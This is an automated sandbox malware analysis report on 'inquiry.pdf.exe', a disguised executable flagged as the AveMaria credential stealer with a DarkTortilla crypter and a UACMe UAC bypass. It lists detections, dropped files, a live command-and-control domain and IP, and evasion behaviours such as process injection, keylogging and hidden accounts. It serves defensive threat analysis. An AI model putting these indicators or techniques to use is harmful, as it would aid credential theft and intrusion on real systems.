Windows Analysis Report
inquiry.pdf.exe

Overview

General Information

Sample Name: inquiry.pdf.exe
Analysis ID: 715157
MD5: 6236e43da1b2c6279760e6b2b7e2d40f
SHA1: a24221417ff9c0d169bf17b7f242824fe61d3b72
SHA256: b4056e17199edd889d2b77c02865136c47ab29566717c2f86ae8911c02e2994a
Tags: exe
Infos:

Detection

AveMaria, DarkTortilla, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected DarkTortilla Crypter
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Injects a PE file into a foreign processes
Uses ping.exe to sleep
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: inquiry.pdf.exe ReversingLabs: Detection: 39%
Antivirus / Scanner detection for submitted sample
Source: inquiry.pdf.exe Avira: detected
Yara detected AveMaria stealer
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: hannoyputa.giize.com Virustotal: Detection: 5% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Avira: detection malicious, Label: HEUR/AGEN.1251650
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Avira: detection malicious, Label: TR/Agent.able
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Metadefender: Detection: 13% Perma Link
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe ReversingLabs: Detection: 39%
Machine Learning detection for sample
Source: inquiry.pdf.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 19.0.AddInProcess32.exe.900000.0.unpack Avira: Label: TR/Redcap.ghjpt
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack Malware Configuration Extractor: AveMaria {"C2 url": "hannoyputa.giize.com", "port": 3027}

Exploits
barindex
Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 2400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 1916, type: MEMORYSTR
Uses 32bit PE files
Source: inquiry.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: inquiry.pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 4x nop then mov ecx, 6B3AC8CCh 0_2_00E36B00
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 4x nop then mov ecx, 6B4AC8CCh 18_2_01246B00
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 4x nop then add dword ptr [ebp-20h], 01h 18_2_0124F618

Networking
barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: hannoyputa.giize.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-NYC-11US LEASEWEB-USA-NYC-11US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.105.131.206 23.105.131.206
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49706 -> 23.105.131.206:3027
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: inquiry.pdf.exe, 00000000.00000003.256866785.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: glonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ns.ado/1Imt
Source: glonkjhg.exe, 00000012.00000003.394602968.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.392396802.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.c/gImt
Source: glonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.cobjImt
Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com
Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comIta
Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comTC
Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comers
Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comgo
Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comintTV
Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comize
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.commbe
Source: inquiry.pdf.exe, 00000000.00000003.261955611.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261989796.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.como.(
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com.TTF
Source: inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/
Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmln-uO
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: inquiry.pdf.exe, 00000000.00000003.268808715.000000000652D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268232591.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268609542.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268447326.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html4j-
Source: inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlI
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: inquiry.pdf.exe, 00000000.00000003.267507239.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267605251.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersZ
Source: inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersl
Source: inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comB.TTFd
Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271546551.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271631731.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271758905.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comI.TTF6
Source: inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comR.TTF
Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp 